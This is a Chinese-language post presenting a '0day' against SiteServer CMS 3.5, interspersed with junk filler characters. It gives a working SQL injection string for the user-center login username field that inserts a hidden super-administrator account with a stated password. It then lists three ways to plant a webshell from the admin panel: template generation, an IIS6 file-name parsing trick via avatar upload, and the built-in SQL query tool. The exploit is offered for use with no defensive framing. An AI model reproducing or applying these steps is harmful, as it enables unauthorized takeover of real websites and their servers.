SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
0 d7 n  ]$ k: L& ~0 M) {% B
% z* ]/ I: r. @7 q+ ]

5 w$ h: f9 B3 f" ?. ?& FEXP:
0 n5 A8 J' g5 D% C
直接访问UserCenter/login.aspx

* k0 s+ X; z& S, C0 e, l
( Z: ~9 m( }; \7 T1 `* {% A
+ n% ?- W" u8 i" W用户名处输入：

0 r$ G# _: g$ Z8 W( e6 @123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
  n7 r7 D1 N7 ?. ?8 t
& p6 h1 `; R% ^. Q5 P( f  }0 f  j8 j

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
9 @' c! E' v, ^. x' |9 B0 X' N

' f- r  e! V; ~: i3 D
之后再访问后台SiteServer/login.aspx用插入的用户登陆


0 t7 L* j5 i3 d7 i
' K% t2 I2 u9 J( N/ R. W后台拿webshell的三种方法：
, `) v3 P2 `4 h" G8 j% d5 D* e
一、

' e: h% _6 S+ p7 p/ j- Z. k站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
3 `/ p7 d2 ]" A2 n4 L
成员权限-》添加用户-》用户名为：1.asp

; [& g- K5 @. P) l- T3 h$ Y$ Chttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
" J+ M" t7 T2 C2 E2 r& ^- ?
三、
, L5 u/ j- V% t6 }6 \8 g/ q
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
: ~& ^; F- J9 Z* N1 Z; g" T* s
系统工具-》数据库工具-》SQL语句查询
' y: }! s8 j. m* \0 z! P( k这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

2 H+ C+ D( `% t: H- D4 r